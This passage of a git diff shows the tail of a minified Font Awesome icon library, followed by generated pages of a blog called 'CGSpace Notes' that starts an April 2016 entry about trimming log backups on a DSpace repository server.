t.call(n,e,a,r,i)}}(n,a):n;for(void 0===e?(r=1,o=t[c[0]]):(r=0,o=e);r2&&void 0!==arguments[2]?arguments[2]:{},a=e.skipHooks,i=void 0!==a&&a,o=Object.keys(n).reduce((function(t,e){var a=n[e];return 
a.icon?t[a.iconName]=a.icon:t[e]=a,t}),{});"function"!=typeof H.hooks.addPack||i?H.styles[t]=r({},H.styles[t]||{},o):H.hooks.addPack(t,o),"fas"===t&&zt("fa",n)}var Pt=H.styles,Tt=H.shims,It={},jt={},Lt={},Rt=function(){var t=function(t){return Et(Pt,(function(n,e,a){return n[a]=Et(e,t,{}),n}),{})};It=t((function(t,n,e){return n[3]&&(t[n[3]]=e),t})),jt=t((function(t,n,e){var a=n[2];return t[e]=e,a.forEach((function(n){t[n]=e})),t}));var n="far"in Pt;Lt=Et(Tt,(function(t,e){var a=e[0],r=e[1],i=e[2];return"far"!==r||n||(r="fas"),t[a]={prefix:r,iconName:i},t}),{})};function Ft(t,n){return(It[t]||{})[n]}Rt();var Ht=H.styles;function Dt(t){return t.reduce((function(t,n){var e=function(t,n){var e,a=n.split("-"),r=a[0],i=a.slice(1).join("-");return r!==t||""===i||(e=i,~I.indexOf(e))?null:i}(R.familyPrefix,n);if(Ht[n])t.prefix=n;else if(R.autoFetchSvg&&Object.keys(M).indexOf(n)>-1)t.prefix=n;else if(e){var a="fa"===t.prefix?Lt[e]||{prefix:null,iconName:null}:{};t.iconName=a.iconName||e,t.prefix=a.prefix||t.prefix}else n!==R.replacementClass&&0!==n.indexOf("fa-w-")&&t.rest.push(n);return t}),{prefix:null,iconName:null,rest:[]})}function Yt(t){var n=t.tag,e=t.attributes,a=void 0===e?{}:e,r=t.children,i=void 0===r?[]:r;return"string"==typeof t?vt(t):"<".concat(n," ").concat(function(t){return Object.keys(t||{}).reduce((function(n,e){return n+"".concat(e,'="').concat(vt(t[e]),'" ')}),"").trim()}(a),">").concat(i.map(Yt).join(""),"")}var Vt=function(){};function Wt(t){return"string"==typeof(t.getAttribute?t.getAttribute(w):null)}var Xt={replace:function(t){var n=t[0],e=t[1].map((function(t){return Yt(t)})).join("\n");if(n.parentNode&&n.outerHTML)n.outerHTML=e+(R.keepOriginalSource&&"svg"!==n.tagName.toLowerCase()?"\x3c!-- ".concat(n.outerHTML," Font Awesome fontawesome.com --\x3e"):"");else if(n.parentNode){var a=document.createElement("span");n.parentNode.replaceChild(a,n),a.outerHTML=e}},nest:function(t){var n=t[0],e=t[1];if(~gt(n).indexOf(R.replacementClass))return Xt.replace(t);var a=new RegExp("".concat(R.familyPrefix,"-.*"));delete e[0].attributes.style,delete e[0].attributes.id;var r=e[0].attributes.class.split(" ").reduce((function(t,n){return n===R.replacementClass||n.match(a)?t.toSvg.push(n):t.toNode.push(n),t}),{toNode:[],toSvg:[]});e[0].attributes.class=r.toSvg.join(" ");var i=e.map((function(t){return Yt(t)})).join("\n");n.setAttribute("class",r.toNode.join(" ")),n.setAttribute(w,""),n.innerHTML=i}};function Bt(t){t()}function Ut(t,n){var e="function"==typeof n?n:Vt;if(0===t.length)e();else{var a=Bt;"async"===R.mutateApproach&&(a=d.requestAnimationFrame||Bt),a((function(){var n=!0===R.autoReplaceSvg?Xt.replace:Xt[R.autoReplaceSvg]||Xt.replace,a=Ct("mutate");t.map(n),a(),e()}))}}var qt=!1;function Gt(){qt=!1}var Kt=null;function Jt(t){if(h&&R.observeMutations){var n=t.treeCallback,e=t.nodeCallback,a=t.pseudoElementsCallback,r=t.observeMutationsRoot,i=void 0===r?p:r;Kt=new h((function(t){qt||ht(t).forEach((function(t){if("childList"===t.type&&t.addedNodes.length>0&&!Wt(t.addedNodes[0])&&(R.searchPseudoElements&&a(t.target),n(t.target)),"attributes"===t.type&&t.target.parentNode&&R.searchPseudoElements&&a(t.target.parentNode),"attributes"===t.type&&Wt(t.target)&&~P.indexOf(t.attributeName))if("class"===t.attributeName){var r=Dt(gt(t.target)),i=r.prefix,o=r.iconName;i&&t.target.setAttribute("data-prefix",i),o&&t.target.setAttribute("data-icon",o)}else e(t.target)}))})),v&&Kt.observe(i,{childList:!0,attributes:!0,characterData:!0,subtree:!0})}}function Qt(t){var n=function(t){var 
n,e,a=t.getAttribute("data-prefix"),r=t.getAttribute("data-icon"),i=void 0!==t.innerText?t.innerText.trim():"",o=Dt(gt(t));return a&&r&&(o.prefix=a,o.iconName=r),o.prefix&&i.length>1?o.iconName=(n=o.prefix,e=t.innerText,(jt[n]||{})[e]):o.prefix&&1===i.length&&(o.iconName=Ft(o.prefix,St(t.innerText))),o}(t),e=n.iconName,a=n.prefix,r=n.rest,i=function(t){var n=t.getAttribute("style"),e=[];return n&&(e=n.split(";").reduce((function(t,n){var e=n.split(":"),a=e[0],r=e.slice(1);return a&&r.length>0&&(t[a]=r.join(":").trim()),t}),{})),e}(t),o=function(t){return function(t){var n={size:16,x:0,y:0,flipX:!1,flipY:!1,rotate:0};return t?t.toLowerCase().split(" ").reduce((function(t,n){var e=n.toLowerCase().split("-"),a=e[0],r=e.slice(1).join("-");if(a&&"h"===r)return t.flipX=!0,t;if(a&&"v"===r)return t.flipY=!0,t;if(r=parseFloat(r),isNaN(r))return t;switch(a){case"grow":t.size=t.size+r;break;case"shrink":t.size=t.size-r;break;case"left":t.x=t.x-r;break;case"right":t.x=t.x+r;break;case"up":t.y=t.y-r;break;case"down":t.y=t.y+r;break;case"rotate":t.rotate=t.rotate+r}return t}),n):n}(t.getAttribute("data-fa-transform"))}(t),c=function(t){var n=t.getAttribute("data-fa-symbol");return null!==n&&(""===n||n)}(t),s=function(t){var n=ht(t.attributes).reduce((function(t,n){return"class"!==t.name&&"style"!==t.name&&(t[n.name]=n.value),t}),{}),e=t.getAttribute("title"),a=t.getAttribute("data-fa-title-id");return R.autoA11y&&(e?n["aria-labelledby"]="".concat(R.replacementClass,"-title-").concat(a||pt()):(n["aria-hidden"]="true",n.focusable="false")),n}(t),f=function(t){var n=t.getAttribute("data-fa-mask");return n?Dt(n.split(" ").map((function(t){return t.trim()}))):{prefix:null,iconName:null,rest:[]}}(t);return{iconName:e,title:t.getAttribute("title"),titleId:t.getAttribute("data-fa-title-id"),prefix:a,transform:o,symbol:c,mask:f,maskId:t.getAttribute("data-fa-mask-id"),extra:{classes:r,styles:i,attributes:s}}}function Zt(t){this.name="MissingIcon",this.message=t||"Icon unavailable",this.stack=(new Error).stack}Zt.prototype=Object.create(Error.prototype),Zt.prototype.constructor=Zt;var $t={fill:"currentColor"},tn={attributeType:"XML",repeatCount:"indefinite",dur:"2s"},nn={tag:"path",attributes:r({},$t,{d:"M156.5,447.7l-12.6,29.5c-18.7-9.5-35.9-21.2-51.5-34.9l22.7-22.7C127.6,430.5,141.5,440,156.5,447.7z M40.6,272H8.5 c1.4,21.2,5.4,41.7,11.7,61.1L50,321.2C45.1,305.5,41.8,289,40.6,272z M40.6,240c1.4-18.8,5.2-37,11.1-54.1l-29.5-12.6 C14.7,194.3,10,216.7,8.5,240H40.6z M64.3,156.5c7.8-14.9,17.2-28.8,28.1-41.5L69.7,92.3c-13.7,15.6-25.5,32.8-34.9,51.5 L64.3,156.5z M397,419.6c-13.9,12-29.4,22.3-46.1,30.4l11.9,29.8c20.7-9.9,39.8-22.6,56.9-37.6L397,419.6z M115,92.4 c13.9-12,29.4-22.3,46.1-30.4l-11.9-29.8c-20.7,9.9-39.8,22.6-56.8,37.6L115,92.4z M447.7,355.5c-7.8,14.9-17.2,28.8-28.1,41.5 l22.7,22.7c13.7-15.6,25.5-32.9,34.9-51.5L447.7,355.5z M471.4,272c-1.4,18.8-5.2,37-11.1,54.1l29.5,12.6 c7.5-21.1,12.2-43.5,13.6-66.8H471.4z M321.2,462c-15.7,5-32.2,8.2-49.2,9.4v32.1c21.2-1.4,41.7-5.4,61.1-11.7L321.2,462z M240,471.4c-18.8-1.4-37-5.2-54.1-11.1l-12.6,29.5c21.1,7.5,43.5,12.2,66.8,13.6V471.4z M462,190.8c5,15.7,8.2,32.2,9.4,49.2h32.1 c-1.4-21.2-5.4-41.7-11.7-61.1L462,190.8z M92.4,397c-12-13.9-22.3-29.4-30.4-46.1l-29.8,11.9c9.9,20.7,22.6,39.8,37.6,56.9 L92.4,397z M272,40.6c18.8,1.4,36.9,5.2,54.1,11.1l12.6-29.5C317.7,14.7,295.3,10,272,8.5V40.6z M190.8,50 c15.7-5,32.2-8.2,49.2-9.4V8.5c-21.2,1.4-41.7,5.4-61.1,11.7L190.8,50z M442.3,92.3L419.6,115c12,13.9,22.3,29.4,30.5,46.1 l29.8-11.9C470,128.5,457.3,109.4,442.3,92.3z 
M397,92.4l22.7-22.7c-15.6-13.7-32.8-25.5-51.5-34.9l-12.6,29.5 C370.4,72.1,384.4,81.5,397,92.4z"})},en=r({},tn,{attributeName:"opacity"}),an={tag:"g",children:[nn,{tag:"circle",attributes:r({},$t,{cx:"256",cy:"364",r:"28"}),children:[{tag:"animate",attributes:r({},tn,{attributeName:"r",values:"28;14;28;28;14;28;"})},{tag:"animate",attributes:r({},en,{values:"1;0;1;1;0;1;"})}]},{tag:"path",attributes:r({},$t,{opacity:"1",d:"M263.7,312h-16c-6.6,0-12-5.4-12-12c0-71,77.4-63.9,77.4-107.8c0-20-17.8-40.2-57.4-40.2c-29.1,0-44.3,9.6-59.2,28.7 c-3.9,5-11.1,6-16.2,2.4l-13.1-9.2c-5.6-3.9-6.9-11.8-2.6-17.2c21.2-27.2,46.4-44.7,91.2-44.7c52.3,0,97.4,29.8,97.4,80.2 c0,67.6-77.4,63.5-77.4,107.8C275.7,306.6,270.3,312,263.7,312z"}),children:[{tag:"animate",attributes:r({},en,{values:"1;0;0;0;0;1;"})}]},{tag:"path",attributes:r({},$t,{opacity:"0",d:"M232.5,134.5l7,168c0.3,6.4,5.6,11.5,12,11.5h9c6.4,0,11.7-5.1,12-11.5l7-168c0.3-6.8-5.2-12.5-12-12.5h-23 C237.7,122,232.2,127.7,232.5,134.5z"}),children:[{tag:"animate",attributes:r({},en,{values:"0;0;1;1;0;0;"})}]}]},rn=H.styles;function on(t){var n=t[0],e=t[1],a=i(t.slice(4),1)[0];return{found:!0,width:n,height:e,icon:Array.isArray(a)?{tag:"g",attributes:{class:"".concat(R.familyPrefix,"-").concat(T.GROUP)},children:[{tag:"path",attributes:{class:"".concat(R.familyPrefix,"-").concat(T.SECONDARY),fill:"currentColor",d:a[0]}},{tag:"path",attributes:{class:"".concat(R.familyPrefix,"-").concat(T.PRIMARY),fill:"currentColor",d:a[1]}}]}:{tag:"path",attributes:{fill:"currentColor",d:a}}}}function cn(t,n){return new lt((function(e,a){var r={found:!1,width:512,height:512,icon:an};if(t&&n&&rn[n]&&rn[n][t])return e(on(rn[n][t]));t&&n&&!R.showMissingIcons?a(new Zt("Icon is missing for prefix ".concat(n," with icon name ").concat(t))):e(r)}))}var sn=H.styles;function fn(t){var n=Qt(t);return~n.extra.classes.indexOf(N)?function(t,n){var e=n.title,a=n.transform,r=n.extra,i=null,o=null;if(b){var c=parseInt(getComputedStyle(t).fontSize,10),s=t.getBoundingClientRect();i=s.width/c,o=s.height/c}return R.autoA11y&&!e&&(r.attributes["aria-hidden"]="true"),lt.resolve([t,At({content:t.innerHTML,width:i,height:o,transform:a,title:e,extra:r,watchable:!0})])}(t,n):function(t,n){var e=n.iconName,a=n.title,r=n.titleId,o=n.prefix,c=n.transform,s=n.symbol,f=n.mask,l=n.maskId,u=n.extra;return new lt((function(n,m){lt.all([cn(e,o),cn(f.iconName,f.prefix)]).then((function(f){var m=i(f,2),d=m[0],p=m[1];n([t,_t({icons:{main:d,mask:p},prefix:o,iconName:e,transform:c,symbol:s,mask:p,maskId:l,title:a,titleId:r,extra:u,watchable:!0})])}))}))}(t,n)}function ln(t){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;if(v){var e=p.documentElement.classList,a=function(t){return e.add("".concat(k,"-").concat(t))},r=function(t){return e.remove("".concat(k,"-").concat(t))},i=R.autoFetchSvg?Object.keys(M):Object.keys(sn),o=[".".concat(N,":not([").concat(w,"])")].concat(i.map((function(t){return".".concat(t,":not([").concat(w,"])")}))).join(", ");if(0!==o.length){var c=[];try{c=ht(t.querySelectorAll(o))}catch(t){}if(c.length>0){a("pending"),r("complete");var s=Ct("onTree"),f=c.reduce((function(t,n){try{var e=fn(n);e&&t.push(e)}catch(t){A||t instanceof Zt&&console.error(t)}return t}),[]);return new lt((function(t,e){lt.all(f).then((function(e){Ut(e,(function(){a("active"),a("complete"),r("pending"),"function"==typeof n&&n(),s(),t()}))})).catch((function(){s(),e()}))}))}}}}function un(t){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;fn(t).then((function(t){t&&Ut([t],n)}))}function 
mn(t,n){var e="".concat("data-fa-pseudo-element-pending").concat(n.replace(":","-"));return new lt((function(a,i){if(null!==t.getAttribute(e))return a();var o=ht(t.children).filter((function(t){return t.getAttribute(x)===n}))[0],c=d.getComputedStyle(t,n),s=c.getPropertyValue("font-family").match(C),f=c.getPropertyValue("font-weight"),l=c.getPropertyValue("content");if(o&&!s)return t.removeChild(o),a();if(s&&"none"!==l&&""!==l){var u=c.getPropertyValue("content"),m=~["Solid","Regular","Light","Duotone","Brands","Kit"].indexOf(s[2])?O[s[2].toLowerCase()]:E[f],h=St(3===u.length?u.substr(1,1):u),g=Ft(m,h),v=g;if(!g||o&&o.getAttribute("data-prefix")===m&&o.getAttribute("data-icon")===v)a();else{t.setAttribute(e,v),o&&t.removeChild(o);var b={iconName:null,title:null,titleId:null,prefix:null,transform:mt,symbol:!1,mask:null,maskId:null,extra:{classes:[],styles:{},attributes:{}}},y=b.extra;y.attributes[x]=n,cn(g,m).then((function(i){var o=_t(r({},b,{icons:{main:i,mask:{prefix:null,iconName:null,rest:[]}},prefix:m,iconName:v,extra:y,watchable:!0})),c=p.createElement("svg");":before"===n?t.insertBefore(c,t.firstChild):t.appendChild(c),c.outerHTML=o.map((function(t){return Yt(t)})).join("\n"),t.removeAttribute(e),a()})).catch(i)}}else a()}))}function dn(t){return lt.all([mn(t,":before"),mn(t,":after")])}function pn(t){return!(t.parentNode===document.head||~_.indexOf(t.tagName.toUpperCase())||t.getAttribute(x)||t.parentNode&&"svg"===t.parentNode.tagName)}function hn(t){if(v)return new lt((function(n,e){var a=ht(t.querySelectorAll("*")).filter(pn).map(dn),r=Ct("searchPseudoElements");qt=!0,lt.all(a).then((function(){r(),Gt(),n()})).catch((function(){r(),Gt(),e()}))}))}function gn(){var t="fa",n=y,e=R.familyPrefix,a=R.replacementClass,r='svg:not(:root).svg-inline--fa {\n overflow: visible;\n}\n\n.svg-inline--fa {\n display: inline-block;\n font-size: inherit;\n height: 1em;\n overflow: visible;\n vertical-align: -0.125em;\n}\n.svg-inline--fa.fa-lg {\n vertical-align: -0.225em;\n}\n.svg-inline--fa.fa-w-1 {\n width: 0.0625em;\n}\n.svg-inline--fa.fa-w-2 {\n width: 0.125em;\n}\n.svg-inline--fa.fa-w-3 {\n width: 0.1875em;\n}\n.svg-inline--fa.fa-w-4 {\n width: 0.25em;\n}\n.svg-inline--fa.fa-w-5 {\n width: 0.3125em;\n}\n.svg-inline--fa.fa-w-6 {\n width: 0.375em;\n}\n.svg-inline--fa.fa-w-7 {\n width: 0.4375em;\n}\n.svg-inline--fa.fa-w-8 {\n width: 0.5em;\n}\n.svg-inline--fa.fa-w-9 {\n width: 0.5625em;\n}\n.svg-inline--fa.fa-w-10 {\n width: 0.625em;\n}\n.svg-inline--fa.fa-w-11 {\n width: 0.6875em;\n}\n.svg-inline--fa.fa-w-12 {\n width: 0.75em;\n}\n.svg-inline--fa.fa-w-13 {\n width: 0.8125em;\n}\n.svg-inline--fa.fa-w-14 {\n width: 0.875em;\n}\n.svg-inline--fa.fa-w-15 {\n width: 0.9375em;\n}\n.svg-inline--fa.fa-w-16 {\n width: 1em;\n}\n.svg-inline--fa.fa-w-17 {\n width: 1.0625em;\n}\n.svg-inline--fa.fa-w-18 {\n width: 1.125em;\n}\n.svg-inline--fa.fa-w-19 {\n width: 1.1875em;\n}\n.svg-inline--fa.fa-w-20 {\n width: 1.25em;\n}\n.svg-inline--fa.fa-pull-left {\n margin-right: 0.3em;\n width: auto;\n}\n.svg-inline--fa.fa-pull-right {\n margin-left: 0.3em;\n width: auto;\n}\n.svg-inline--fa.fa-border {\n height: 1.5em;\n}\n.svg-inline--fa.fa-li {\n width: 2em;\n}\n.svg-inline--fa.fa-fw {\n width: 1.25em;\n}\n\n.fa-layers svg.svg-inline--fa {\n bottom: 0;\n left: 0;\n margin: auto;\n position: absolute;\n right: 0;\n top: 0;\n}\n\n.fa-layers {\n display: inline-block;\n height: 1em;\n position: relative;\n text-align: center;\n vertical-align: -0.125em;\n width: 1em;\n}\n.fa-layers svg.svg-inline--fa {\n 
-webkit-transform-origin: center center;\n transform-origin: center center;\n}\n\n.fa-layers-counter, .fa-layers-text {\n display: inline-block;\n position: absolute;\n text-align: center;\n}\n\n.fa-layers-text {\n left: 50%;\n top: 50%;\n -webkit-transform: translate(-50%, -50%);\n transform: translate(-50%, -50%);\n -webkit-transform-origin: center center;\n transform-origin: center center;\n}\n\n.fa-layers-counter {\n background-color: #ff253a;\n border-radius: 1em;\n -webkit-box-sizing: border-box;\n box-sizing: border-box;\n color: #fff;\n height: 1.5em;\n line-height: 1;\n max-width: 5em;\n min-width: 1.5em;\n overflow: hidden;\n padding: 0.25em;\n right: 0;\n text-overflow: ellipsis;\n top: 0;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: top right;\n transform-origin: top right;\n}\n\n.fa-layers-bottom-right {\n bottom: 0;\n right: 0;\n top: auto;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: bottom right;\n transform-origin: bottom right;\n}\n\n.fa-layers-bottom-left {\n bottom: 0;\n left: 0;\n right: auto;\n top: auto;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: bottom left;\n transform-origin: bottom left;\n}\n\n.fa-layers-top-right {\n right: 0;\n top: 0;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: top right;\n transform-origin: top right;\n}\n\n.fa-layers-top-left {\n left: 0;\n right: auto;\n top: 0;\n -webkit-transform: scale(0.25);\n transform: scale(0.25);\n -webkit-transform-origin: top left;\n transform-origin: top left;\n}\n\n.fa-lg {\n font-size: 1.3333333333em;\n line-height: 0.75em;\n vertical-align: -0.0667em;\n}\n\n.fa-xs {\n font-size: 0.75em;\n}\n\n.fa-sm {\n font-size: 0.875em;\n}\n\n.fa-1x {\n font-size: 1em;\n}\n\n.fa-2x {\n font-size: 2em;\n}\n\n.fa-3x {\n font-size: 3em;\n}\n\n.fa-4x {\n font-size: 4em;\n}\n\n.fa-5x {\n font-size: 5em;\n}\n\n.fa-6x {\n font-size: 6em;\n}\n\n.fa-7x {\n font-size: 7em;\n}\n\n.fa-8x {\n font-size: 8em;\n}\n\n.fa-9x {\n font-size: 9em;\n}\n\n.fa-10x {\n font-size: 10em;\n}\n\n.fa-fw {\n text-align: center;\n width: 1.25em;\n}\n\n.fa-ul {\n list-style-type: none;\n margin-left: 2.5em;\n padding-left: 0;\n}\n.fa-ul > li {\n position: relative;\n}\n\n.fa-li {\n left: -2em;\n position: absolute;\n text-align: center;\n width: 2em;\n line-height: inherit;\n}\n\n.fa-border {\n border: solid 0.08em #eee;\n border-radius: 0.1em;\n padding: 0.2em 0.25em 0.15em;\n}\n\n.fa-pull-left {\n float: left;\n}\n\n.fa-pull-right {\n float: right;\n}\n\n.fa.fa-pull-left,\n.fas.fa-pull-left,\n.far.fa-pull-left,\n.fal.fa-pull-left,\n.fab.fa-pull-left {\n margin-right: 0.3em;\n}\n.fa.fa-pull-right,\n.fas.fa-pull-right,\n.far.fa-pull-right,\n.fal.fa-pull-right,\n.fab.fa-pull-right {\n margin-left: 0.3em;\n}\n\n.fa-spin {\n -webkit-animation: fa-spin 2s infinite linear;\n animation: fa-spin 2s infinite linear;\n}\n\n.fa-pulse {\n -webkit-animation: fa-spin 1s infinite steps(8);\n animation: fa-spin 1s infinite steps(8);\n}\n\n@-webkit-keyframes fa-spin {\n 0% {\n -webkit-transform: rotate(0deg);\n transform: rotate(0deg);\n }\n 100% {\n -webkit-transform: rotate(360deg);\n transform: rotate(360deg);\n }\n}\n\n@keyframes fa-spin {\n 0% {\n -webkit-transform: rotate(0deg);\n transform: rotate(0deg);\n }\n 100% {\n -webkit-transform: rotate(360deg);\n transform: rotate(360deg);\n }\n}\n.fa-rotate-90 {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";\n 
-webkit-transform: rotate(90deg);\n transform: rotate(90deg);\n}\n\n.fa-rotate-180 {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";\n -webkit-transform: rotate(180deg);\n transform: rotate(180deg);\n}\n\n.fa-rotate-270 {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";\n -webkit-transform: rotate(270deg);\n transform: rotate(270deg);\n}\n\n.fa-flip-horizontal {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";\n -webkit-transform: scale(-1, 1);\n transform: scale(-1, 1);\n}\n\n.fa-flip-vertical {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";\n -webkit-transform: scale(1, -1);\n transform: scale(1, -1);\n}\n\n.fa-flip-both, .fa-flip-horizontal.fa-flip-vertical {\n -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";\n -webkit-transform: scale(-1, -1);\n transform: scale(-1, -1);\n}\n\n:root .fa-rotate-90,\n:root .fa-rotate-180,\n:root .fa-rotate-270,\n:root .fa-flip-horizontal,\n:root .fa-flip-vertical,\n:root .fa-flip-both {\n -webkit-filter: none;\n filter: none;\n}\n\n.fa-stack {\n display: inline-block;\n height: 2em;\n position: relative;\n width: 2.5em;\n}\n\n.fa-stack-1x,\n.fa-stack-2x {\n bottom: 0;\n left: 0;\n margin: auto;\n position: absolute;\n right: 0;\n top: 0;\n}\n\n.svg-inline--fa.fa-stack-1x {\n height: 1em;\n width: 1.25em;\n}\n.svg-inline--fa.fa-stack-2x {\n height: 2em;\n width: 2.5em;\n}\n\n.fa-inverse {\n color: #fff;\n}\n\n.sr-only {\n border: 0;\n clip: rect(0, 0, 0, 0);\n height: 1px;\n margin: -1px;\n overflow: hidden;\n padding: 0;\n position: absolute;\n width: 1px;\n}\n\n.sr-only-focusable:active, .sr-only-focusable:focus {\n clip: auto;\n height: auto;\n margin: 0;\n overflow: visible;\n position: static;\n width: auto;\n}\n\n.svg-inline--fa .fa-primary {\n fill: var(--fa-primary-color, currentColor);\n opacity: 1;\n opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa .fa-secondary {\n fill: var(--fa-secondary-color, currentColor);\n opacity: 0.4;\n opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-primary {\n opacity: 0.4;\n opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-secondary {\n opacity: 1;\n opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa mask .fa-primary,\n.svg-inline--fa mask .fa-secondary {\n fill: black;\n}\n\n.fad.fa-inverse {\n color: #fff;\n}';if(e!==t||a!==n){var i=new RegExp("\\.".concat(t,"\\-"),"g"),o=new RegExp("\\--".concat(t,"\\-"),"g"),c=new RegExp("\\.".concat(n),"g");r=r.replace(i,".".concat(e,"-")).replace(o,"--".concat(e,"-")).replace(c,".".concat(a))}return r}function vn(){R.autoAddCss&&!wn&&(dt(gn()),wn=!0)}function bn(t,n){return Object.defineProperty(t,"abstract",{get:n}),Object.defineProperty(t,"html",{get:function(){return t.abstract.map((function(t){return Yt(t)}))}}),Object.defineProperty(t,"node",{get:function(){if(v){var n=p.createElement("div");return n.innerHTML=t.html,n.children}}}),t}var yn=new(function(){function t(){!function(t,n){if(!(t instanceof n))throw new TypeError("Cannot call a class as a function")}(this,t),this.definitions={}}var n,a;return n=t,a=[{key:"add",value:function(){for(var t=this,n=arguments.length,e=new Array(n),a=0;a0&&void 0!==arguments[0]?arguments[0]:{};if(v){vn();var n=t.node,e=void 0===n?p:n,a=t.callback,r=void 0===a?function(){}:a;return R.searchPseudoElements&&hn(e),ln(e,r)}return lt.reject("Operation requires a DOM of some 
kind.")},css:gn,insertCss:function(){wn||(dt(gn()),wn=!0)},watch:function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},n=t.autoReplaceSvgRoot,e=t.observeMutationsRoot;!1===R.autoReplaceSvg&&(R.autoReplaceSvg=!0),R.observeMutations=!0,V((function(){_n({autoReplaceSvgRoot:n}),Jt({treeCallback:ln,nodeCallback:un,pseudoElementsCallback:hn,observeMutationsRoot:e})}))}},kn=(function(t){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=n.transform,a=void 0===e?mt:e,i=n.symbol,o=void 0!==i&&i,c=n.mask,s=void 0===c?null:c,f=n.maskId,l=void 0===f?null:f,u=n.title,m=void 0===u?null:u,d=n.titleId,p=void 0===d?null:d,h=n.classes,g=void 0===h?[]:h,v=n.attributes,b=void 0===v?{}:v,y=n.styles,w=void 0===y?{}:y;if(t){var x=t.prefix,k=t.iconName,_=t.icon;return bn(r({type:"icon"},t),(function(){return vn(),R.autoA11y&&(m?b["aria-labelledby"]="".concat(R.replacementClass,"-title-").concat(p||pt()):(b["aria-hidden"]="true",b.focusable="false")),_t({icons:{main:on(_),mask:s?on(s.icon):{found:!1,width:null,height:null,icon:{}}},prefix:x,iconName:k,transform:r({},mt,a),symbol:o,title:m,maskId:l,titleId:p,extra:{attributes:b,styles:w,classes:g}})}))}},xn),_n=function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},n=t.autoReplaceSvgRoot,e=void 0===n?p:n;(Object.keys(H.styles).length>0||R.autoFetchSvg)&&v&&R.autoReplaceSvg&&kn.i2svg({node:e})};yn.add({prefix:"fas",iconName:"folder",icon:[512,512,[],"f07b","M464 128H272l-64-64H48C21.49 64 0 85.49 0 112v288c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V176c0-26.51-21.49-48-48-48z"]},{prefix:"fas",iconName:"tag",icon:[512,512,[],"f02b","M0 252.118V48C0 21.49 21.49 0 48 0h204.118a48 48 0 0 1 33.941 14.059l211.882 211.882c18.745 18.745 18.745 49.137 0 67.882L293.823 497.941c-18.745 18.745-49.137 18.745-67.882 0L14.059 286.059A48 48 0 0 1 0 252.118zM112 64c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.49-48-48-48z"]}),yn.add({prefix:"fab",iconName:"facebook-f",icon:[320,512,[],"f39e","M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z"]},{prefix:"fab",iconName:"twitter",icon:[512,512,[],"f099","M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z"]},{prefix:"fab",iconName:"linkedin-in",icon:[448,512,[],"f0e1","M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z"]}),xn.watch()})(); \ No newline at end of file diff --git a/docs/page/1/index.html b/docs/page/1/index.html new file mode 100644 index 
000000000..76a4b477b --- /dev/null +++ b/docs/page/1/index.html @@ -0,0 +1,10 @@ + + + + https://alanorth.github.io/cgspace-notes/ + + + + + + diff --git a/docs/page/10/index.html b/docs/page/10/index.html new file mode 100644 index 000000000..6dd3f4b96 --- /dev/null +++ b/docs/page/10/index.html @@ -0,0 +1,325 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

April, 2016

+ +
+

2016-04-04

+
    +
  • Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit
  • +
  • We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc
  • +
  • After running DSpace for over five years I’ve never needed to look in any other log file than dspace.log, let alone one from last year!
  • +
